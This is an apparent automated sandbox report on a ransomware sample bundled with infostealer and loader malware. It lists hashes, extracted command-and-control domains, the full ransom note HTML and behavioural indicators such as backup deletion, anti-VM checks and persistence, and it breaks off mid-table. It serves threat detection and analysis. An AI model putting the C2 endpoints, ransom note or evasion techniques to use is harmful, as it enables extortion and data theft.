phobos | 160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a

Resubmissions

25-06-2023 05:35

230625-f93nrseb7x 8

25-06-2023 05:27

230625-f5sb8sdb56 8

25-06-2023 04:47

230625-fejx6seb3t 10

Analysis

max time kernel
101s
max time network
203s
platform
windows10-1703_x64
resource
win10-20230621-en
resource tags

arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system
submitted
25-06-2023 04:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe
Size

288KB
MD5

6ae917525435e23b07d15537fb40aea0
SHA1

7c85b447bb5608ba7fb6a332c033c0cdad0430ae
SHA256

160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
SHA512

23e5f94e964d53d72af0d6ad31da309539116a9963806ce7b0d3c028a69ab343df6cd6f3989b280e70a285395425a1cb93492fe5030968558ada5f7de047aaed
SSDEEP

6144:Ft+WQdzUUPFTf2HHvKlHQho0jT21v3Ifz/x2ShelxPcWpv:61oqm+QbjTIwr/l00m

Score

10^/10

phobos redline smokeloader systembc 1 agilenet backdoor collection evasion infostealer persistence ransomware spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

dexstat255.xyz:46578

Attributes

auth_value
c4805fc19583231a4c5bb64b0e833716

Extracted

Family

systembc

adstat277xm.xyz:4044

demstat377xm.xyz:4044

Extracted

Family

smokeloader

Version

2022

http://serverlogs37.xyz/statweb255/

http://servblog757.xyz/statweb255/

http://dexblog45.xyz/statweb255/

http://admlogs.online/statweb255/

http://blogstat355.xyz/statweb255/

http://blogstatserv25.xyz/statweb255/

rc4.i32

Extracted

Path

C:\info.hta

Ransom Note

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html> <head> <meta charset='windows-1251'> <title>cartilage</title> <HTA:APPLICATION ICON='msiexec.exe' SINGLEINSTANCE='yes' SysMenu="no"> <script language='JScript'> window.moveTo(50, 50); window.resizeTo(screen.width - 100, screen.height - 100); </script> <style type='text/css'> body { font: 15px Tahoma, sans-serif; margin: 10px; line-height: 25px; background: #C6B5C4; } img { display:inline-block; } .bold { font-weight: bold; } .mark { background: #B5CC8E; padding: 2px 5px; } .header { text-align: center; font-size: 30px; line-height: 50px; font-weight: bold; margin-bottom:20px; } .info { background: #e6ecf2; border-left: 10px solid #B58CB2; } .alert { background: #FFE4E4; border-left: 10px solid #FFA07A; } .private { border: 1px dashed #000; background: #FFFFEF; } .note { height: auto; padding-bottom: 1px; margin: 15px 0; } .note .title { font-weight: bold; text-indent: 10px; height: 30px; line-height: 30px; padding-top: 10px; } .note .mark { background: #A2A2B5; } .note ul { margin-top: 0; } .note pre { margin-left: 15px; line-height: 13px; font-size: 13px; } .footer { position:fixed; bottom:0; right:0; text-align: right; } </style> </head> <body> <div class='header'> <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII='> <div>All your files have been encrypted!</div> </div> <div class='bold'>All your files have been encrypted due to a security problem with your PC.</div> <div class='bold'>If you want to restore them, write us to the e-mail <span class='mark'>[email protected]</span></div> <div class='bold'>Or write us to the Tox: <span class='mark'>78E21CFF7AA85F713C1530AEF2E74E62830BEE77238F4B0A73E5E3251EAD56427BF9F7A1A074</span></div> <div class='bold'>Write this ID in the title of your message <span class='mark'>3DAA590A-3483</span></div> <div> You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the tool that will decrypt all your files. </div> <div class='note info'> <div class='title'>Free decryption as guarantee</div> <ul>Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 4Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.) </ul> </div> <div class='note info'> <div class='title'>How to obtain Bitcoins</div> <ul> The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price. <br><a href='https://localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a> <br> Also you can find other places to buy Bitcoins and beginners guide here: <br><a href='http://www.coindesk.com/information/how-can-i-buy-bitcoins/'>http://www.coindesk.com/information/how-can-i-buy-bitcoins/</a> </ul> </div> <div class='note alert'> <div class='title'>Attention!</div> <ul> <li>Do not rename encrypted files.</li> <li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li> <li>Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</li> </ul> </div> </body> </html>

Emails

class='mark'>[email protected]</span></div>

URLs

http://www.w3.org/TR/html4/strict.dtd'>

Signatures

Phobos
Phobos ransomware appeared at the beginning of 2019.
ransomware phobos
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

3A1E.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3A1E.exe
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid process

4844 bcdedit.exe
3260 bcdedit.exe
4240 bcdedit.exe
3472 bcdedit.exe
Renames multiple (455) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 4572 powershell.exe
Deletes backup catalog 3 TTPs 2 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exe

pid process

2524 wbadmin.exe
2720 wbadmin.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

3764 netsh.exe
2100 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3A1E.exe

pid	process
4844	bcdedit.exe
3260	bcdedit.exe
4240	bcdedit.exe
3472	bcdedit.exe

flow	pid	process
1	4572	powershell.exe

pid	process
2524	wbadmin.exe
2720	wbadmin.exe

pid	process
3764	netsh.exe
2100	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

3A1E.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3A1E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3A1E.exe

Deletes itself 1 IoCs

Processes:

156D.exe

pid process

5056 156D.exe

pid	process
5056	156D.exe

Drops startup file 3 IoCs

Processes:

156D.exe

description	ioc	process
File created	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\156D.exe	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	156D.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[3DAA590A-3483].[[email protected]].8base	156D.exe

Executes dropped EXE 8 IoCs

Processes:

ldx999sx.exes777mx.exeldx999sx.exe1201.exe156D.exe1BB8.exe156D.exe3A1E.exe

pid process

3560 ldx999sx.exe
3708 s777mx.exe
3684 ldx999sx.exe
5100 1201.exe
5056 156D.exe
4116 1BB8.exe
872 156D.exe
368 3A1E.exe
Loads dropped DLL 1 IoCs

Processes:

3A1E.exe

pid process

368 3A1E.exe

pid	process
3560	ldx999sx.exe
3708	s777mx.exe
3684	ldx999sx.exe
5100	1201.exe
5056	156D.exe
4116	1BB8.exe
872	156D.exe
368	3A1E.exe

pid	process
368	3A1E.exe

Obfuscated with Agile.Net obfuscator 3 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\3A1E.exe	agile_net
C:\Users\Admin\AppData\Local\Temp\3A1E.exe	agile_net
behavioral2/memory/368-1299-0x0000000000EF0000-0x000000000154E000-memory.dmp	agile_net

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll	themida
\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll	themida
behavioral2/memory/368-1651-0x000000006FC20000-0x0000000070200000-memory.dmp	themida

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

156D.exe1201.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Windows\CurrentVersion\Run\156D = "C:\\Users\\Admin\\AppData\\Local\\156D.exe"	156D.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe"	1201.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\156D = "C:\\Users\\Admin\\AppData\\Local\\156D.exe"	156D.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

3A1E.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3A1E.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3A1E.exe

Drops desktop.ini file(s) 43 IoCs

Processes:

156D.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	156D.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	156D.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	156D.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3592352177-2971570228-3741369827-1000\desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	156D.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3592352177-2971570228-3741369827-1000\desktop.ini	156D.exe
File opened for modification	C:\Program Files\desktop.ini	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	156D.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	156D.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	156D.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	156D.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs

Processes:

powershell.exe

pid	process
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exeldx999sx.exe

description	pid	process	target process
PID 4572 set thread context of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 3560 set thread context of 3684	3560	ldx999sx.exe	ldx999sx.exe

Drops file in Program Files directory 64 IoCs

Processes:

156D.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailWideTile.scale-125.png	156D.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar	156D.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.conf	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vreg\word.x-none.msi.16.x-none.vreg.dat	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\cx_16x11.png	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\ui-strings.js.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\NIRMALA.TTF	156D.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.clusters	156D.exe
File created	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libsubsusf_plugin.dll	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-unplated_contrast-black.png	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\tumbleweed.png	156D.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\Client.xml	156D.exe
File created	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win7.wmv.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\AppxManifest.xml	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf	156D.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8268_40x40x32.png	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\resources.pri	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\ui-strings.js.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files\7-Zip\Lang\ast.txt.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-execution.xml	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ul-oob.xrm-ms	156D.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html	156D.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\TabTip32.exe.mui	156D.exe
File created	C:\Program Files\Java\jdk1.8.0_66\bin\jar.exe.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\ui-strings.js	156D.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe	156D.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\skype_titlebar_logo.scale-125.png	156D.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg	156D.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar	156D.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBUI6.CHM.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Grace-ul-oob.xrm-ms	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\cardsLoadingSequence.png	156D.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\eml.scale-16.png	156D.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_ca.xml	156D.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html	156D.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ja-jp\ui-strings.js	156D.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.ELM.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\ui-strings.js.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main-selector.css.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui	156D.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_SubTrial-pl.xrm-ms.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ppd.xrm-ms	156D.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\so_60x42.png	156D.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\example_icons2x.png	156D.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-80_altform-unplated.png	156D.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msadrh15.dll	156D.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\ReachFramework.resources.dll	156D.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Classic\mask\cardback.png	156D.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProVL_MAK-ppd.xrm-ms.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\eu-es\ui-strings.js.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\libcurl64.dlla.manifest.id[3DAA590A-3483].[[email protected]].8base	156D.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected][3DAA590A-3483].[[email protected]].8base	156D.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\si_16x11.png	156D.exe

Checks SCSI registry key(s) 3 TTPs 7 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exeldx999sx.exe

description	ioc	process
